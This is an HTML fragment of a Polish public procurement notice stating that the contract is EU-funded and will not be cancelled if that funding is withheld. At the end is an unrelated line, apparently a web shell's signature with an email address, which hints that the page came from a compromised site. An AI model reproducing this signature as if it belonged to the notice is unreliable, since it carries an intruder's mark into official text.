<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane jest ze środków Programu Operacyjnego Infrastruktura i Środowisko na podstawie umowy Nr POIS.01.01.00-00-239/10/00 zawartej w dniu 01.03.2012r pomiędzy Zamawiającym a Wojewódzkim Funduszem Ochrony Środowiska i Gospodarki Wodnej w Rzeszowie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com